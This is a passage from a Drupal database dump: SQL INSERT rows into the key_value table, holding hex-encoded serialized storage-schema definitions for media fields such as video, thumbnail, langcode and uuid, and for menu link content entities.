b613a313a7b733a32373a226669656c645f6d656469615f696d6167655f7461726765745f6964223b613a323a7b733a353a227461626c65223b733a31323a2266696c655f6d616e61676564223b733a373a22636f6c756d6e73223b613a313a7b733a32373a226669656c645f6d656469615f696d6167655f7461726765745f6964223b733a333a22666964223b7d7d7d7d7d),
('entity.storage_schema.sql', 'media.field_schema_data.field_media_oembed_video', 0x613a323a7b733a33313a226d656469615f5f6669656c645f6d656469615f6f656d6265645f766964656f223b613a343a7b733a31313a226465736372697074696f6e223b733a35343a22446174612073746f7261676520666f72206d65646961206669656c64206669656c645f6d656469615f6f656d6265645f766964656f2e223b733a363a226669656c6473223b613a373a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a33303a226669656c645f6d656469615f6f656d6265645f766964656f5f76616c7565223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a323a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d7d7d733a34303a226d656469615f7265766973696f6e5f5f6669656c645f6d656469615f6f656d6265645f766964656f223b613a343a7b733a31313a226465736372697074696f6e223b733a36363a225265766973696f6e20617263686976652073746f7261676520666f72206d65646961206669656c64206669656c645f6d656469615f6f656d6265645f766964656f2e223b733a363a226669656c6473223b613a373a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a33303a226669656c645f6d656469615f6f656d6265645f766964656f5f76616c7565223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a227072696d617279206b6579223b613a353a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a227265766973696f6e5f6964223b693a323b733a373a2264656c65746564223b693a333b733a353a2264656c7461223b693a343b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a323a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d7d7d7d),
('entity.storage_schema.sql', 'media.field_schema_data.field_media_video_file', 0x613a323a7b733a32393a226d656469615f5f6669656c645f6d656469615f766964656f5f66696c65223b613a353a7b733a31313a226465736372697074696f6e223b733a35323a22446174612073746f7261676520666f72206d65646961206669656c64206669656c645f6d656469615f766964656f5f66696c652e223b733a363a226669656c6473223b613a393a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a33323a226669656c645f6d656469615f766964656f5f66696c655f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32363a22546865204944206f66207468652066696c6520656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d733a33303a226669656c645f6d656469615f766964656f5f66696c655f646973706c6179223b613a363a7b733a31313a226465736372697074696f6e223b733a37353a22466c616720746f20636f6e74726f6c207768657468657220746869732066696c652073686f756c6420626520646973706c61796564207768656e2076696577696e6720636f6e74656e742e223b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a22756e7369676e6564223b623a313b733a373a2264656661756c74223b693a313b733a383a226e6f74206e756c6c223b623a303b7d733a33343a226669656c645f6d656469615f766964656f5f66696c655f6465736372697074696f6e223b613a333a7b733a31313a226465736372697074696f6e223b733a32363a2241206465736372697074696f6e206f66207468652066696c652e223b733a343a2274797065223b733a343a2274657874223b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a33323a226669656c645f6d656469615f766964656f5f66696c655f7461726765745f6964223b613a313a7b693a303b733a33323a226669656c645f6d656469615f766964656f5f66696c655f7461726765745f6964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a33323a226669656c645f6d656469615f766964656f5f66696c655f7461726765745f6964223b613a323a7b733a353a227461626c65223b733a31323a2266696c655f6d616e61676564223b733a373a22636f6c756d6e73223b613a313a7b733a33323a226669656c645f6d656469615f766964656f5f66696c655f7461726765745f6964223b733a333a22666964223b7d7d7d7d733a33383a226d656469615f7265766973696f6e5f5f6669656c645f6d656469615f766964656f5f66696c65223b613a353a7b733a31313a226465736372697074696f6e223b733a36343a225265766973696f6e20617263686976652073746f7261676520666f72206d65646961206669656c64206669656c645f6d656469615f766964656f5f66696c652e223b733a363a226669656c6473223b613a393a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a33323a226669656c645f6d656469615f766964656f5f66696c655f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32363a22546865204944206f66207468652066696c6520656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d733a33303a226669656c645f6d656469615f766964656f5f66696c655f646973706c6179223b613a363a7b733a31313a226465736372697074696f6e223b733a37353a22466c616720746f20636f6e74726f6c207768657468657220746869732066696c652073686f756c6420626520646973706c61796564207768656e2076696577696e6720636f6e74656e742e223b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a22756e7369676e6564223b623a313b733a373a2264656661756c74223b693a313b733a383a226e6f74206e756c6c223b623a303b7d733a33343a226669656c645f6d656469615f766964656f5f66696c655f6465736372697074696f6e223b613a333a7b733a31313a226465736372697074696f6e223b733a32363a2241206465736372697074696f6e206f66207468652066696c652e223b733a343a2274797065223b733a343a2274657874223b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a353a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a227265766973696f6e5f6964223b693a323b733a373a2264656c65746564223b693a333b733a353a2264656c7461223b693a343b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a33323a226669656c645f6d656469615f766964656f5f66696c655f7461726765745f6964223b613a313a7b693a303b733a33323a226669656c645f6d656469615f766964656f5f66696c655f7461726765745f6964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a33323a226669656c645f6d656469615f766964656f5f66696c655f7461726765745f6964223b613a323a7b733a353a227461626c65223b733a31323a2266696c655f6d616e61676564223b733a373a22636f6c756d6e73223b613a313a7b733a33323a226669656c645f6d656469615f766964656f5f66696c655f7461726765745f6964223b733a333a22666964223b7d7d7d7d7d),
('entity.storage_schema.sql', 'media.field_schema_data.langcode', 0x613a343a7b733a353a226d65646961223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31363a226d656469615f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31343a226d656469615f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32303a226d656469615f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.storage_schema.sql', 'media.field_schema_data.mid', 0x613a343a7b733a353a226d65646961223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a226d6964223b613a343a7b733a343a2274797065223b733a363a2273657269616c223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31363a226d656469615f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a226d6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31343a226d656469615f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a226d6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32303a226d656469615f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a226d6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'media.field_schema_data.name', 0x613a323a7b733a31363a226d656469615f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a343a226e616d65223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a32303a226d656469615f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a343a226e616d65223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'media.field_schema_data.revision_created', 0x613a313a7b733a31343a226d656469615f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a227265766973696f6e5f63726561746564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'media.field_schema_data.revision_default', 0x613a313a7b733a31343a226d656469615f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a227265766973696f6e5f64656661756c74223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'media.field_schema_data.revision_log_message', 0x613a313a7b733a31343a226d656469615f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32303a227265766973696f6e5f6c6f675f6d657373616765223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'media.field_schema_data.revision_translation_affected', 0x613a323a7b733a31363a226d656469615f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a32303a226d656469615f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'media.field_schema_data.revision_user', 0x613a313a7b733a31343a226d656469615f7265766973696f6e223b613a323a7b733a363a226669656c6473223b613a313a7b733a31333a227265766973696f6e5f75736572223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a33373a226d656469615f6669656c645f5f7265766973696f6e5f757365725f5f7461726765745f6964223b613a313a7b693a303b733a31333a227265766973696f6e5f75736572223b7d7d7d7d),
('entity.storage_schema.sql', 'media.field_schema_data.status', 0x613a323a7b733a31363a226d656469615f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22737461747573223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32303a226d656469615f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22737461747573223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'media.field_schema_data.thumbnail', 0x613a323a7b733a31363a226d656469615f6669656c645f64617461223b613a333a7b733a363a226669656c6473223b613a353a7b733a32303a227468756d626e61696c5f5f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32363a22546865204944206f66207468652066696c6520656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d733a31343a227468756d626e61696c5f5f616c74223b613a343a7b733a31313a226465736372697074696f6e223b733a35363a22416c7465726e617469766520696d61676520746578742c20666f722074686520696d61676527732027616c7427206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3531323b733a383a226e6f74206e756c6c223b623a303b7d733a31363a227468756d626e61696c5f5f7469746c65223b613a343a7b733a31313a226465736372697074696f6e223b733a35323a22496d616765207469746c6520746578742c20666f722074686520696d616765277320277469746c6527206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a313032343b733a383a226e6f74206e756c6c223b623a303b7d733a31363a227468756d626e61696c5f5f7769647468223b613a343a7b733a31313a226465736372697074696f6e223b733a33333a22546865207769647468206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d733a31373a227468756d626e61696c5f5f686569676874223b613a343a7b733a31313a226465736372697074696f6e223b733a33343a2254686520686569676874206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a33333a226d656469615f6669656c645f5f7468756d626e61696c5f5f7461726765745f6964223b613a313a7b693a303b733a32303a227468756d626e61696c5f5f7461726765745f6964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a33333a226d656469615f6669656c645f5f7468756d626e61696c5f5f7461726765745f6964223b613a323a7b733a353a227461626c65223b733a31323a2266696c655f6d616e61676564223b733a373a22636f6c756d6e73223b613a313a7b733a32303a227468756d626e61696c5f5f7461726765745f6964223b733a333a22666964223b7d7d7d7d733a32303a226d656469615f6669656c645f7265766973696f6e223b613a333a7b733a363a226669656c6473223b613a353a7b733a32303a227468756d626e61696c5f5f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32363a22546865204944206f66207468652066696c6520656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d733a31343a227468756d626e61696c5f5f616c74223b613a343a7b733a31313a226465736372697074696f6e223b733a35363a22416c7465726e617469766520696d61676520746578742c20666f722074686520696d61676527732027616c7427206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3531323b733a383a226e6f74206e756c6c223b623a303b7d733a31363a227468756d626e61696c5f5f7469746c65223b613a343a7b733a31313a226465736372697074696f6e223b733a35323a22496d616765207469746c6520746578742c20666f722074686520696d616765277320277469746c6527206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a313032343b733a383a226e6f74206e756c6c223b623a303b7d733a31363a227468756d626e61696c5f5f7769647468223b613a343a7b733a31313a226465736372697074696f6e223b733a33333a22546865207769647468206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d733a31373a227468756d626e61696c5f5f686569676874223b613a343a7b733a31313a226465736372697074696f6e223b733a33343a2254686520686569676874206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a33333a226d656469615f6669656c645f5f7468756d626e61696c5f5f7461726765745f6964223b613a313a7b693a303b733a32303a227468756d626e61696c5f5f7461726765745f6964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a33333a226d656469615f6669656c645f5f7468756d626e61696c5f5f7461726765745f6964223b613a323a7b733a353a227461626c65223b733a31323a2266696c655f6d616e61676564223b733a373a22636f6c756d6e73223b613a313a7b733a32303a227468756d626e61696c5f5f7461726765745f6964223b733a333a22666964223b7d7d7d7d7d),
('entity.storage_schema.sql', 'media.field_schema_data.uid', 0x613a323a7b733a31363a226d656469615f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a333a22756964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a32373a226d656469615f6669656c645f5f7569645f5f7461726765745f6964223b613a313a7b693a303b733a333a22756964223b7d7d7d733a32303a226d656469615f6669656c645f7265766973696f6e223b613a323a7b733a363a226669656c6473223b613a313a7b733a333a22756964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a32373a226d656469615f6669656c645f5f7569645f5f7461726765745f6964223b613a313a7b693a303b733a333a22756964223b7d7d7d7d),
('entity.storage_schema.sql', 'media.field_schema_data.uuid', 0x613a313a7b733a353a226d65646961223b613a323a7b733a363a226669656c6473223b613a313a7b733a343a2275756964223b613a343a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a32343a226d656469615f6669656c645f5f757569645f5f76616c7565223b613a313a7b693a303b733a343a2275756964223b7d7d7d7d),
('entity.storage_schema.sql', 'media.field_schema_data.vid', 0x613a343a7b733a353a226d65646961223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22766964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a31363a226d656469615f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22766964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31343a226d656469615f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22766964223b613a343a7b733a343a2274797065223b733a363a2273657269616c223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32303a226d656469615f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22766964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'menu_link_content.entity_schema_data', 0x613a343a7b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b613a323a7b733a31313a227072696d617279206b6579223b613a313a7b693a303b733a323a226964223b7d733a31313a22756e69717565206b657973223b613a313a7b733a33303a226d656e755f6c696e6b5f636f6e74656e745f5f7265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d7d7d733a32363a226d656e755f6c696e6b5f636f6e74656e745f7265766973696f6e223b613a323a7b733a31313a227072696d617279206b6579223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a373a22696e6465786573223b613a313a7b733a32313a226d656e755f6c696e6b5f636f6e74656e745f5f6964223b613a313a7b693a303b733a323a226964223b7d7d7d733a32323a226d656e755f6c696e6b5f636f6e74656e745f64617461223b613a323a7b733a31313a227072696d617279206b6579223b613a323a7b693a303b733a323a226964223b693a313b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a34393a226d656e755f6c696e6b5f636f6e74656e745f5f69645f5f64656661756c745f6c616e67636f64655f5f6c616e67636f6465223b613a333a7b693a303b733a323a226964223b693a313b733a31363a2264656661756c745f6c616e67636f6465223b693a323b733a383a226c616e67636f6465223b7d733a33303a226d656e755f6c696e6b5f636f6e74656e745f5f7265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a33333a226d656e755f6c696